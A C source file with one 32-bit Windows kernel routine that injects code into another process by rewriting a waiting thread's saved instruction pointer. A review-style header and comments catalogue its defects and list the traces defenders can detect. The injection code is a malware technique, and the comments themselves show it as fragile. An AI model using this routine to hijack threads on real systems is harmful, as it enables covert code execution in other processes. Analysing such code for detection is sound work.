/*
 * InsertRemoteCode - kernel-mode routine that redirects one thread of the
 * process identified by ProcessId so that its saved user-mode EIP points at a
 * freshly committed copy of the bytes at Function.
 *
 * What the code visibly does:
 *   1. Resolves KeSuspendThread/KeResumeThread through GetFunctionAddress
 *      using four 32-bit constants each (presumably a byte-pattern lookup of
 *      unexported routines; neither result is checked for NULL before use).
 *   2. Looks the process up with PsLookupProcessByProcessId, then walks a
 *      linked list reached via a hard-coded offset (+0x50) from the EPROCESS,
 *      deriving each ETHREAD with another hard-coded offset (-0x1b0) and
 *      reading a state byte (+0x2d), a CLIENT_ID (+0x1f0) and a trap-frame
 *      pointer (+0x134) from it.
 *   3. For the first thread whose state byte equals 1: opens the process
 *      with PROCESS_ALL_ACCESS, commits RegionSize (0x20) bytes in it with
 *      PAGE_READWRITE, calls AttachProcess, copies 0x20 bytes from Function,
 *      suspends the thread, overwrites TrapFramePointer->Eip with the new
 *      region's address, resumes the thread and leaves the loop.
 *
 * All pointer arithmetic goes through ULONG and the trap frame type is
 * PX86_KTRAP_FRAME, so this is 32-bit only, and the raw offsets tie it to
 * one specific kernel build; on any other build the reads in step 2 touch
 * unrelated memory. From a defensive standpoint the observable footprint is
 * a kernel-originated ZwOpenProcess(PROCESS_ALL_ACCESS), a new MEM_COMMIT
 * region that is not image-backed, and a thread whose saved EIP lands in
 * that region.
 *
 * @param ProcessId  PID of the target process (cast to HANDLE for lookup).
 * @param Function   Source bytes; exactly RegionSize (0x20) bytes are copied
 *                   regardless of the actual length of the code there.
 * @return NtStatus of the last failing call, or the AttachProcess status on
 *         the break path; the post-loop ZwFreeVirtualMemory/ZwClose results
 *         are discarded and never affect the return value.
 *
 * Review notes (defects visible in this block, left as-is):
 *   - PsLookupProcessByProcessId returns a referenced EPROCESS; there is no
 *     ObDereferenceObject(PEProcess) on any path, so every call leaks one
 *     reference.
 *   - AttachProcess has no visible matching detach here; presumably handled
 *     elsewhere - verify against its definition.
 *   - ProcessHandle is never initialised. If the list is empty or no thread
 *     has state 1, the post-loop ZwFreeVirtualMemory/ZwClose run on an
 *     indeterminate handle with FunctionAddress == NULL.
 *   - The same post-loop cleanup also runs on the successful break path,
 *     i.e. it attempts to free the region the thread was just pointed at.
 *   - Both ZwFreeVirtualMemory calls pass six arguments mirroring the
 *     ZwAllocateVirtualMemory call; the documented prototype takes four
 *     (ProcessHandle, BaseAddress, RegionSize, FreeType). Check the declared
 *     prototype in this project - as written the cleanup is unlikely to do
 *     what its name suggests.
 *   - ThreadHandle, ThreadID and Counter are written but never read.
 */
NTSTATUS InsertRemoteCode(IN ULONG ProcessId,IN PVOID Function)
{
    PX86_KTRAP_FRAME TrapFramePointer;
    NTSTATUS NtStatus=STATUS_SUCCESS;
    PEPROCESS PEProcess=NULL;
    PETHREAD PEThread=NULL;
    HANDLE ProcessHandle;            /* never initialised; see review notes */
    HANDLE ThreadHandle;             /* unused */
    OBJECT_ATTRIBUTES ObjectAttributes;
    CLIENT_ID ProcessID;
    CLIENT_ID ThreadID;              /* assigned in the loop, never read */
    ULONG ThreadListHead=0;
    ULONG Flink=0;
    ULONG Counter=0;                 /* incremented only; never read */
    UCHAR ThreadState=0;
    ULONG EThread=0;
    PVOID FunctionAddress=NULL;
    SIZE_T RegionSize=0x20;          /* fixed copy/allocation length */
    ProcessID.UniqueProcess=(HANDLE)ProcessId;
    ProcessID.UniqueThread=(HANDLE)0;
    /* Presumably pattern-based lookups of unexported routines; results are
     * not checked before being called below. */
    KeSuspendThread=(FuncType)GetFunctionAddress(0x8b55ff8b,0x0cec83ec,0x758b5653,0x8e8d5708);
    KeResumeThread=(FuncType)GetFunctionAddress(0x8b55ff8b,0xff5651ec,0x4d871415,0x084d8b80);
    /* Takes a reference on PEProcess that is never released in this function. */
    NtStatus=PsLookupProcessByProcessId((HANDLE)ProcessId, &PEProcess);
    if (NT_SUCCESS(NtStatus)) {
        /* Build-specific offset: the value at EPROCESS+0x50 is treated as a
         * LIST_ENTRY head and walked via its Flink until it wraps around. */
        ThreadListHead=(ULONG)PEProcess;
        ThreadListHead=(ULONG)(ThreadListHead+0x50);
        Flink=*(ULONG*)ThreadListHead;
        while (Flink!=ThreadListHead) {
            Counter++;
            /* Build-specific offsets from the list entry back to the ETHREAD
             * and into its state byte / CLIENT_ID. */
            EThread=(ULONG)Flink-0x1b0;
            ThreadState=*(UCHAR*)(EThread+0x2d);
            ThreadID=*(CLIENT_ID*)(EThread+0x1f0);
            if (ThreadState==1) {
                PEThread=(PETHREAD)EThread;
                /* Build-specific offset to the thread's saved trap frame. */
                TrapFramePointer=*(PX86_KTRAP_FRAME*)((ULONG)PEThread+0x134);
                InitializeObjectAttributes(&ObjectAttributes,NULL,OBJ_KERNEL_HANDLE,NULL,NULL);
                NtStatus=ZwOpenProcess(&ProcessHandle,(ACCESS_MASK)PROCESS_ALL_ACCESS,&ObjectAttributes,&ProcessID);
                if (NT_SUCCESS(NtStatus)) {
                    NtStatus=ZwAllocateVirtualMemory (ProcessHandle,&FunctionAddress,0,&RegionSize,MEM_COMMIT,PAGE_READWRITE);
                    if (NT_SUCCESS(NtStatus)) {
                        /* No matching detach is visible in this function. */
                        NtStatus=AttachProcess(ProcessId);
                        if (NT_SUCCESS(NtStatus)) {
                            /* Copies exactly RegionSize bytes from Function. */
                            RtlCopyMemory(FunctionAddress,Function,RegionSize);
                            KeSuspendThread(PEThread);
                            TrapFramePointer->Eip=(ULONG)FunctionAddress;
                            KeResumeThread(PEThread);
                            /* Falls through to the post-loop cleanup below. */
                            break;
                        } else {
                            /* Six-argument call; documented prototype has four.
                             * Return value discarded. */
                            ZwFreeVirtualMemory(ProcessHandle,&FunctionAddress,0,&RegionSize,MEM_COMMIT,PAGE_READWRITE);
                            ZwClose(ProcessHandle);
                            return NtStatus;
                        }
                    } else {
                        ZwClose(ProcessHandle);
                        return NtStatus;
                    }
                } else {
                    return NtStatus;
                }
            }
            Flink=*(ULONG*)Flink;
        }
    } else {
        return NtStatus;
    }
    /* Reached both after a successful break and when no thread with state 1
     * was found; in the latter case ProcessHandle is indeterminate and
     * FunctionAddress is NULL. Return values are discarded. */
    ZwFreeVirtualMemory(ProcessHandle,&FunctionAddress,0,&RegionSize,MEM_COMMIT,PAGE_READWRITE);
    ZwClose(ProcessHandle);
    return NtStatus;
}